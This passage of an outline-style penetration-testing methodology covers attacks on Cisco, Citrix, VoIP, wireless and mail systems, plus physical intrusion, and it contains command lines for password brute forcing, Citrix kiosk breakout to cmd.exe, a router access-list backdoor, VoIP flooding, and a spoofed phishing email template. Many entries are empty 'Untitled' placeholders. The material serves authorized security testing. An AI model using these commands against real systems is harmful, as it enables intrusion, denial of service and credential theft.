18.1.3. Exploitation CVE References CVE-2005-1244 - Severity : High - CVSS : 7.0 CVE-2005-1243 - Severity : Low - CVSS : 3.3 CVE-2005-1242 - Severity : Low - CVSS : 3.3 CVE-2005-1241 - Severity : High - CVSS : 7.0 CVE-2005-1240 - Severity : High - CVSS : 7.0 CVE-2005-1239 - Severity : Low - CVSS : 3.3 CVE-2005-1238 - Severity : High - CVSS : 9.0 CVE-2005-1182 - Severity : Low - CVSS : 3.3 CVE-2005-1133 - Severity : Low - CVSS : 3.3 CVE-2005-1025 - Severity : Low - CVSS : 3.3 CVE-2005-0868 - Severity : High - CVSS : 7.0 CVE-2005-0899 - Severity : Low - CVSS : 2.3 CVE-2002-1822 - Severity : Low - CVSS : 3.3 CVE-2002-1731 - Severity : Low - CVSS : 2.3 CVE-2000-1038 - Severity : Low - CVSS : 3.3 CVE-1999-1279 - Severity : Low - CVSS : 3.3 CVE-1999-1012 - Severity : Low - CVSS : 3.3 Access with Work Station Gateway http://target:5061/WSG Default AS/400 accounts. Network attacks (next release) DB2 QSHELL Hijacking Terminals Trojan attacks Hacking from AS/400

18.2. Local

18.2.1. System Value Security Untitled Untitled Untitled Untitled Untitled Untitled Untitled Recommended value is 30

18.2.2. Password Policy Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled

18.2.3. Audit level Untitled Recommended value is *SECURITY

18.2.4. Documentation Users class Untitled System Audit Settings Untitled Special Authorities Definitions Untitled

19. Bluetooth Specific Testing

19.1. Bluescanner

19.2. Bluesweep

19.3. btscanner

19.4. Redfang

19.5. Blueprint

19.6. Bluesnarfer

19.7. Bluebugger

19.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

19.8. Blueserial

19.9. Bloover

19.10. Bluesniff

19.11. Exploit Frameworks

19.11.1. BlueMaho Untitled

19.12. Resources

19.12.1. URL's Bluejackers bluetooth-pentest Trifinite

19.12.2. Vulnerability Information Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

19.12.3. White Papers Bluesnarfing

20. Cisco Specific Testing

20.1. Methodology

20.1.1. Scan & Fingerprint. Untitled Untitled If SNMP is active, then community string guessing should be performed.

20.1.2. Credentials Guessing. Untitled Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

20.1.3. Connect Untitled If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

20.1.4. Check for bugs Untitled The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

20.1.5. Further your attack Untitled running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network. Untitled #> access-list 100 permit ip <IP> any

20.2. Scan & Fingerprint.

20.2.1. Port Scanning nmap Untitled Other tools Untitled mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

20.2.2. Fingerprinting Untitled BT cisco-torch-0.4b # -A Untitled TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt Untitled

20.3. Password Guessing.

20.3.1. Untitled ./CAT  -h  <IP>  -a  password.wordlist Untitled

20.3.2. Untitled ./enabler <IP> [-u username] -p password /password.wordlist [port] Untitled

20.3.3. Untitled BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco Untitled

20.4. SNMP Attacks.

20.4.1. Untitled ./CAT  -h  <IP>  -w  SNMP.wordlist Untitled

20.4.2. Untitled onesixytone  -c  SNMP.wordlist  <IP> BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

20.4.3. Untitled snmapwalk  -v  <Version>  -c  <Community string>  <IP> Untitled

20.5. Connecting.

20.5.1. Telnet Untitled  telnet  <IP> Sample Banners

20.5.2. SSH

20.5.3. Web Browser Untitled This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

20.5.4. TFTP Untitled Untitled ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names. Untitled ./ <options> <IP,hostname,network> ./ <options> -F <hostlist> Creating backdoors in Cisco IOS using TCL

20.6. Known Bugs.

20.6.1. Attack Tools Untitled Untitled Untitled Web browse to the Cisco device: http://<IP> Untitled Untitled Untitled Untitled ./ios-w3-vul fetch > /tmp/router.txt

20.6.2. Common Vulnerabilities and Exploits (CVE) Information Vulnerabilties and exploit information relating to these products can be found here:

20.7. Configuration Files.

20.7.1. Untitled Configuration files explained The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access. Untitled Untitled Password Encryption Utilised Untitled Configuration Testing Tools Nipper fwauto (Beta)

20.8. References.

20.8.1. Cisco IOS Exploitation Techniques

21. Citrix Specific Testing

21.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

21.2. Enumeration

21.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

21.2.2. site search Manual review web page for useful information review source for web page

21.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

21.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAdress=ip_address connect.js connect.js TCPBrowserAdress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

21.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

21.2.6. nmap nse scripts citrix-enum-apps nmap -sU --script=citrix-enum-apps -p 1604 <host> citrix-enum-apps-xml nmap --script=citrix-enum-apps-xml -p 80,443 <host> citrix-enum-servers nmap -sU --script=citrix-enum-servers -p 1604 citrix-enum-servers-xml nmap --script=citrix-enum-servers-xml -p 80,443 <host> citrix-brute-xml nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

21.3. Scanning

21.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

21.3.2. Nikto perl -host ip_address -port port_no. Untitled

21.4. Exploitation

21.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

21.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

21.4.3. Manual Testing Create Batch File (cmd.bat) 1 2 Host Scripting File (cmd.vbs) Option Explicit Dim objShell objShell.Run "%comspec% /k" WScript.Quit alternative functionality iKat Integrated Kiosk Attack Tool AT Command - priviledge escalation AT HH:MM /interactive "cmd.exe" AT HH:MM /interactive %comspec% /k Untitled Keyboard Shortcuts/ Hotkeys Ctrl + h – View History Ctrl + n – New Browser Shift + Left Click – New Browser Ctrl + o – Internet Address (browse feature) Ctrl + p – Print (to file) Right Click (Shift + F10) F1 – Jump to URL SHIFT+F1: Local Task List SHIFT+F2: Toggle Title Bar SHIFT+F3: Close Remote Application CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del CTRL+F2: Remote Task List CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC ALT+F2: Cycle through programs ALT+PLUS: Alt+TAB ALT+MINUS: ALT+SHIFT+TAB

21.5. Brute Force

21.5.1. bforce.js bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt Untitled

21.6. Review Configuration Files

21.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

21.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

21.6.3. Citrix ICA client configuration file wfclient.ini Location

21.7. References

21.7.1. Vulnerabilities Art of Hacking Common Vulnerabilities and Exploits (CVE) Sample file Untitled OSVDB[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia Secunia SecurityFocus

21.7.2. Support Citrix Knowledge Base Thinworld

21.7.3. Exploits Milw0rm Art of Hacking Citrix

21.7.4. Tools Resource Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

22. Network Backbone

22.1. Generic Toolset

22.1.1. Wireshark (Formerly Ethereal) Passive Sniffing Usernames/Passwords Email FTP HTTP HTTPS RDP VOIP Other Filters ip.src == ip_address ip.dst == ip_address tcp.dstport == port_no. ! ip.addr == ip_address (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

22.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

22.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

22.1.4. NTP-Fingerprint perl -t [ip_address]

22.1.5. Yersinia

22.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

22.1.7. Manual Check (Credentials required)

22.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

23. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

23.1. Password Attacks

23.1.1. Known Accounts Identified Passwords Unidentified Hashes

23.1.2. Default Accounts Identified Passwords Unidentified Hashes

23.2. Exploits

23.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

23.2.2. Unsuccessful Exploits

23.2.3. Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no indexing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for!

23.3. Tools

23.3.1. Metasploit Free Extra Modules local copy

23.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets Untitled

23.3.3. SQL Power Injector

23.3.4. SecurityForest

23.3.5. SPI Dynamics WebInspect

23.3.6. Core Impact

23.3.7. Cisco Global Exploiter

23.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

23.3.9. CANVAS

23.3.10. Inguma

24. Server Specific Tests

24.1. Databases

24.1.1. Direct Access Interrogation MS SQL Server Ports Version osql Oracle Ports TNS Listener SQL Plus Default Account/Passwords Default SID's MySQL Ports Version Users/Passwords DB2 Informix Sybase Other

24.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

24.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

24.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

24.2. Mail

24.2.1. Scans

24.2.2. Fingerprint Manual Automated

24.2.3. Spoofable Telnet spoof telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: []X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target [email protected]

24.2.4. Relays

24.3. VPN

24.3.1. Scanning 500 UDP IPSEC 1723 TCP PPTP 443 TCP/SSL nmap -sU -PN -p 500 ipsecscan

24.3.2. Fingerprinting ike-scan --showbackoff

24.3.3. PSK Crack ikeprobe sniff for responses with C&A or ikecrack

24.4. Web

24.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

24.4.2. Permissions PUT /test.txt HTTP/1.0 CONNECT HTTP/1.0 POST HTTP/1.0Content-Type: text/plainContent-Length: 6

24.4.3. Scans

24.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

24.4.5. Directory Traversal\

25. VoIP Security

25.1. Sniffing Tools

25.1.1. AuthTool

25.1.2. Cain & Abel

25.1.3. Etherpeek

25.1.4. NetDude

25.1.5. Oreka

25.1.6. PSIPDump

25.1.7. SIPomatic

25.1.8. SIPv6 Analyzer

25.1.9. UCSniff

25.1.10. VoiPong

25.1.11. VOMIT

25.1.12. Wireshark

25.1.13. WIST - Web Interface for SIP Trace

25.2. Scanning and Enumeration Tools

25.2.1. enumIAX

25.2.2. fping

25.2.3. IAX Enumerator

25.2.4. iWar

25.2.5. Nessus

25.2.6. Nmap

25.2.7. SIP Forum Test Framework (SFTF)

25.2.8. SIPcrack

25.2.9. sipflanker python 192.168.1-254

25.2.10. SIP-Scan

25.2.11. SIP.Tastic

25.2.12. SIPVicious

25.2.13. SiVuS

25.2.14. SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

25.2.15. snmpwalk

25.2.16. VLANping

25.2.17. VoIPAudit

25.2.18. VoIP GHDB Entries

25.2.19. VoIP Voicemail Database

25.3. Packet Creation and Flooding Tools

25.3.1. H.323 Injection Files

25.3.2. H225regreject

25.3.3. IAXHangup

25.3.4. IAXAuthJack

25.3.5. IAX.Brute

25.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

25.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

25.3.8. kphone-ddos

25.3.9. RTP Flooder

25.3.10. rtpbreak

25.3.11. Scapy

25.3.12. Seagull

25.3.13. SIPBomber

25.3.14. SIPNess

25.3.15. SIPp

25.3.16. SIPsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected]main Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

25.3.17. SIP-Send-Fun

25.3.18. SIPVicious

25.3.19. Spitter

25.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

25.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

25.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

25.3.23. Voiphopper

25.4. Fuzzing Tools

25.4.1. Asteroid

25.4.2. Codenomicon VoIP Fuzzers

25.4.3. Fuzzy Packet

25.4.4. Mu Security VoIP Fuzzing Platform

25.4.5. ohrwurm RTP Fuzzer

25.4.6. PROTOS H.323 Fuzzer

25.4.7. PROTOS SIP Fuzzer

25.4.8. SIP Forum Test Framework (SFTF)

25.4.9. Sip-Proxy

25.4.10. Spirent ThreatEx

25.5. Signaling Manipulation Tools

25.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

25.5.2. BYE Teardown

25.5.3. Check Sync Phone Rebooter

25.5.4. RedirectPoison ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

25.5.5. Registration Adder

25.5.6. Registration Eraser

25.5.7. Registration Hijacker

25.5.8. SIP-Kill

25.5.9. SIP-Proxy-Kill

25.5.10. SIP-RedirectRTP

25.5.11. SipRogue

25.5.12. vnak

25.6. Media Manipulation Tools

25.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.3. RTPProxy

25.6.4. RTPInject

25.7. Generic Software Suites

25.7.1. OAT Office Communication Server Tool Assessment

25.7.2. EnableSecurity VOIPPACK Note: - Add-on for Immunity Canvas

25.8. References

25.8.1. URL's Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here: Default Passwords Hacking Exposed VoIP Tool Pre-requisites VoIPsa

25.8.2. White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

26. Wireless Penetration

26.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

26.1.1. Site Map RF Map Lines of Sight Signal Coverage Physical Map Triangulate APs Satellite Imagery

26.1.2. Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP WPA/PSK 802.1x Access Points ESSID BSSIDs Wireless Clients MAC Addresses Intercepted Traffic

26.2. Wireless Toolkit

26.2.1. Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE inSSIDer iWEPPro karma KisMAC-ng Kismet MiniStumbler Netstumbler Vistumbler Wellenreiter Wifi Hopper WirelessMon WiFiFoFum

26.2.2. Packet Capture Airopeek Airpcap Airtraf Apsniff Cain Commview Ettercap Netmon nmwifi Wireshark

26.2.3. EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump Untitled

26.2.4. Leap Attack Tools asleap thc leap cracker anwrap

26.2.5. WEP/ WPA Password Attack Tools Airbase Aircrack-ptw Aircrack-ng Airsnort cowpatty FiOS Wireless Key Calculator iWifiHack KisMAC-ng Rainbow Tables wep attack wep crack wzcook

26.2.6. Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition

26.2.7. Mapping Software Online Mapping WIGLE Skyhook Tools Knsgem

26.2.8. File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools

26.2.9. IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

26.3. WLAN discovery

26.3.1. Unencrypted WLAN Visible SSID Sniff for IP range Hidden SSID Deauth client

26.3.2. WEP encrypted WLAN Visible SSID WEPattack Hidden SSID Deauth client

26.3.3. WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake

26.3.4. LEAP encrypted WLAN Deauth client Break LEAP

26.3.5. 802.1x WLAN Create Rogue Access Point Airsnarf fake ap Hotspotter Karma Linux rogue AP

26.3.6. Resources URL's Russix Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

27. Physical Security

27.1. Building Security

27.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

27.1.2. Lobby Check for active network jacks. Does receptionist/guard leave lobby? Accessbile printers? Print test page. Obtain phone/personnel listing.

27.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

27.1.4. Room Security Resistance of lock to picking. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

27.1.5. Windows Check windows/doors for visible intruderalarm sensors. Check visible areas for sensitive information. Can you video users logging on?

27.2. Perimeter Security

27.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

27.2.2. Exterior Doors If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

27.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

27.3. Entry Points

27.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into thebuilding without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

27.3.2. Unguarded Doors Identify all unguardedentry points. Are doors secured? Check locks for resistance to lock picking.

27.3.3. Windows Check windows/doors for visible intruderalarm sensors. Attempt to bypass sensors.

27.4. Office Waste

27.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

28. Final Report - template

29. Contributors

29.1. Matt Byrne (

29.1.1. Matt contributed the majority of the Wireless section.

29.2. Arvind Doraiswamy (

29.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

29.3. Lee Lawson (

29.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

29.4. Nabil OUCHN (